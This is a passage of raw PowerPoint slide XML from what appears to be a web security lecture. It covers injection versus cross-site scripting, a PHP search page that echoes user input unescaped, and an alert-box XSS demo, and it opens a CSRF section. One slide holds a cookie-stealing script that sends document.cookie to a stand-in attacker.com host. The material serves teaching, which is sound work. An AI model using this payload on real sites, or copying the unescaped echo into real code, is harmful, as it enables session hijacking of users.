          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0076B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FFFF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Command/SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="412750" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="175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attacker’s malicious code is </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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executed on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF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app’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF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server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97284" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{085F1F49-2BDB-2347-0BD2-630101D48993}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6521450" y="3448844"/>
            <a:ext cx="4044950" cy="2039938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1DB1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FFFF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Cross Site Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="412750" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPts val="175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attacker’s malicious code is </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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executed on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF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victim’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF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browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue Medium" charset="0"/>
              <a:ea typeface="Helvetica Neue Medium" charset="0"/>
              <a:cs typeface="Helvetica Neue Medium" charset="0"/>
              <a:sym typeface="Helvetica Neue Medium" charset="0"/>
            </a:endParaRP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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF3E5163-D7E3-3EB6-60E7-B75F7E85AEC5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Search Example</a:t>
            </a:r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8A6252E9-670A-E9EE-ED20-5FAC8ECBAB93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2004219" y="2605088"/>
            <a:ext cx="8182769" cy="1970882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="5E5E5E"/>
            </a:solidFill>
            <a:miter lim="4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html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title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&gt;Search Results&lt;/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title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body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  &lt;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h1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&gt;Results for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1850" b="0">
                <a:solidFill>
                  <a:srgbClr val="C98C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&lt;?php echo $_GET["q"] ?&gt;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&lt;/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h1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&lt;/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body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&lt;/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html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  <a:endParaRPr lang="en-US" altLang="en-US" sz="1850">
              <a:solidFill>
                <a:srgbClr val="008F00"/>
              </a:solidFill>
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
              <a:sym typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99331" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54F039E4-A0C2-BC85-63C1-03BDD102C6F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5409692" y="2306861"/>
            <a:ext cx="4783362" cy="282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00">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>https://google.com/search?q=&lt;search term&gt;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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{530812CB-68FF-7732-5361-042866944DD8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Normal Request</a:t>
            </a:r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1984049A-8E46-4986-C190-CBF80082809A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2004219" y="1928019"/>
            <a:ext cx="8182769" cy="1927225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="5E5E5E"/>
            </a:solidFill>
            <a:miter lim="4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html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title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&gt;Search Results&lt;/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title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body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  &lt;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h1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&gt;Results for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1850" b="0">
                <a:solidFill>
                  <a:srgbClr val="C98C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&lt;?php echo $_GET["q"] ?&gt;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&lt;/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h1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&lt;/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body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&lt;/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html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  <a:endParaRPr lang="en-US" altLang="en-US" sz="1850">
              <a:solidFill>
                <a:srgbClr val="008F00"/>
              </a:solidFill>
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
              <a:sym typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101379" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A0CFF67-899F-DE9D-9E14-D16096EA30C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6342845" y="1597248"/>
            <a:ext cx="3860031" cy="282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00">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>https://google.com/search?q=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="EE220C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apple</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
              <a:sym typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101380" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C98DB0D-FC92-B0A6-90A8-6B6894FE77D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2004219" y="4398963"/>
            <a:ext cx="8182769" cy="1928019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="B51600"/>
            </a:solidFill>
            <a:miter lim="4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html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title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&gt;Search Results&lt;/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title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body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  &lt;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h1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&gt;Results for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1850" b="0">
                <a:solidFill>
                  <a:srgbClr val="EE220C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apple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&lt;/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h1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  <a:b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</a:b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&lt;/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body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&lt;/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html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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101381" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{530FC731-A018-6CDF-02E4-1BCE29227694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2013906" y="4073352"/>
            <a:ext cx="1526059" cy="282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00"/>
              <a:t>Sent to Browser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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C85AE70-E270-1E24-DACE-A403C0681BE0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Embedded Script</a:t>
            </a:r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D45F9CC5-7EF5-E2D3-D430-0B67CCDC545E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1806575" y="1950244"/>
            <a:ext cx="8578057" cy="1928019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="5E5E5E"/>
            </a:solidFill>
            <a:miter lim="4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html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title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&gt;Search Results&lt;/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title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body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  &lt;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h1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&gt;Results for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1850" b="0">
                <a:solidFill>
                  <a:srgbClr val="C98C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&lt;?php echo $_GET["q"] ?&gt;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&lt;/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h1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&lt;/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body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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1850">
                <a:solidFill>
                  <a:srgbClr val="008F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html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  <a:endParaRPr lang="en-US" altLang="en-US" sz="1850">
              <a:solidFill>
                <a:srgbClr val="008F00"/>
              </a:solidFill>
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
              <a:sym typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103427" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB9FA49A-4B55-C862-5A60-37DA4BA8631B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4195554" y="1632603"/>
            <a:ext cx="6198813" cy="259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50">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>https://google.com/search?q=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="EE220C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&lt;script&gt;alert(“hello”)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1350">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
              <a:sym typeface="Courier" charset="0"/>
            </a:endParaRPr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28E6C162-3E61-847C-591E-DF92D55424D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1806575" y="4421982"/>
            <a:ext cx="8578057" cy="1928019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="5E5E5E"/>
            </a:solidFill>
            <a:miter lim="4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html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title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&gt;Search Results&lt;/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title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body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  &lt;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h1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&gt;Results for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1850">
                <a:solidFill>
                  <a:srgbClr val="EE220C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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1850" b="0">
                <a:solidFill>
                  <a:srgbClr val="EE220C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alert(“hello")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1850">
                <a:solidFill>
                  <a:srgbClr val="EE220C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&lt;/script&gt;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&lt;/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h1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  <a:b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</a:b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&lt;/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body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&lt;/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html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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103429" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9F59A5D-A3E5-E97B-AE3A-3443E81343D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1817056" y="4096370"/>
            <a:ext cx="1526059" cy="282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00"/>
              <a:t>Sent to Browser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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{951E5A41-F34E-4387-D305-ABAFCC9F6412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Cookie Theft!</a:t>
            </a:r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00C393A3-8622-B315-AC54-932A03981BD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="590550" y="2091532"/>
            <a:ext cx="11010107" cy="2970213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="5E5E5E"/>
            </a:solidFill>
            <a:miter lim="4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html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title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&gt;Search Results&lt;/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title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body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  &lt;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h1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&gt;Results for </a:t>
            </a:r>
            <a:b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</a:b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  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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1850">
                <a:solidFill>
                  <a:srgbClr val="EE220C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&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1850" b="0">
              <a:solidFill>
                <a:srgbClr val="EE220C"/>
              </a:solidFill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solidFill>
                  <a:srgbClr val="EE220C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   window.open(“http:///attacker.com?”+cookie=document.cookie)</a:t>
            </a:r>
          </a:p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solidFill>
                  <a:srgbClr val="EE220C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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1850">
                <a:solidFill>
                  <a:srgbClr val="EE220C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&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1850" b="0">
              <a:solidFill>
                <a:srgbClr val="EE220C"/>
              </a:solidFill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solidFill>
                  <a:srgbClr val="EE220C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&lt;/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h1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  <a:b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</a:b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  &lt;/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body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&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1850">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1850" b="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105475" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{901BFFCF-EAA6-AEF6-A334-0CDC3F50D3F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6045589" y="1781034"/>
            <a:ext cx="4844275" cy="259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50">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
                <a:sym typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>https://google.com/search?q=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1350">
                <a:solidFill>
                  <a:srgbClr val="EE220C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&lt;script&gt;…&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1350">
              <a:latin typeface="Courier" charset="0"/>
              <a:ea typeface="Courier" charset="0"/>
              <a:cs typeface="Courier" charset="0"/>
              <a:sym typeface="Courier" charset="0"/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9919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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86F5B764-4C09-E3DD-8175-D9B11D41CEEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889000" y="2266950"/>
            <a:ext cx="10414000" cy="2324100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="362744" eaLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="7450">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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Cross-Site Request Forgery (CSRF)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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{269A571E-A46D-E847-624C-D19BB56AF551}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="172244"/>
            <a:ext cx="10502900" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="379413" eaLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="595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Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46082" name="AutoShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E91A9EC-B9DA-2F9C-1AE8-EA88A03438D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="860425" y="1503363"/>
            <a:ext cx="10471150" cy="1512094"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4935"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="EE220C"/>
            </a:solidFill>
            <a:miter lim="4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41275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b="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue Medium" charset="0"/>
              <a:ea typeface="Helvetica Neue Medium" charset="0"/>
              <a:cs typeface="Helvetica Neue Medium" charset="0"/>
              <a:sym typeface="Helvetica Neue Medium" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46083" name="Line 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{277B562A-154E-D5B6-3ECC-87955FB838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8200" y="2113757"/>
            <a:ext cx="3268663" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="762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0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1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defTabSz="29210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000" b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" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:ea typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:cs typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:sym typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46084" name="AutoShape 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68BA2338-7392-8171-C576-1BA18F1BEB0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1069975" y="1693863"/>
            <a:ext cx="4568032" cy="1130300"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8690"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng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>
            <a:outerShdw blurRad="50800" dist="25400" dir="3599997" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr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29210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b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" charset="0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46085" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06197A94-DCD0-A1C3-3DCE-46242AECE03C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1089025" y="1705769"/>
            <a:ext cx="4529932" cy="5151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0" y="4117"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2980"/>
                  <a:pt x="52" y="1951"/>
                  <a:pt x="136" y="1206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="220" y="461"/>
                  <a:pt x="336" y="0"/>
                  <a:pt x="464" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21136" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21264" y="0"/>
                  <a:pt x="21380" y="461"/>
                  <a:pt x="21464" y="1206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21548" y="1951"/>
                  <a:pt x="21600" y="2980"/>
                  <a:pt x="21600" y="4117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CDEE0"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1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defTabSz="29210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950" b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panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:ea typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:cs typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
              <a:sym typeface="Gill Sans" panose="020B0502020104020203" pitchFamily="34" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46086" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4404F0A8-9EFF-20EE-B297-82DDAB49A51A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1162050" y="1920875"/>
            <a:ext cx="426244" cy="82550"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="851440" cy="165758"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46087" name="Oval 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF3B2686-B711-DF19-734D-8B19B302F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786" y="0"/>
              <a:ext cx="169654" cy="165758"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00882B"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="25400" tIns="25400" rIns="25400" bIns="25400" anchor="ctr"/>
            <a:lstStyle>
              <a:lvl1pPr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1pPr>
              <a:lvl2pPr marL="742950" indent="-28575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2pPr>
              <a:lvl3pPr marL="11430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3pPr>
              <a:lvl4pPr marL="16002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4pPr>
              <a:lvl5pPr marL="20574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5pPr>
              <a:lvl6pPr marL="25146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6pPr>
              <a:lvl7pPr marL="29718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7pPr>
              <a:lvl8pPr marL="34290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8pPr>
              <a:lvl9pPr marL="38862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9pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr defTabSz="2921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0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Gill Sans" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:endParaRPr>
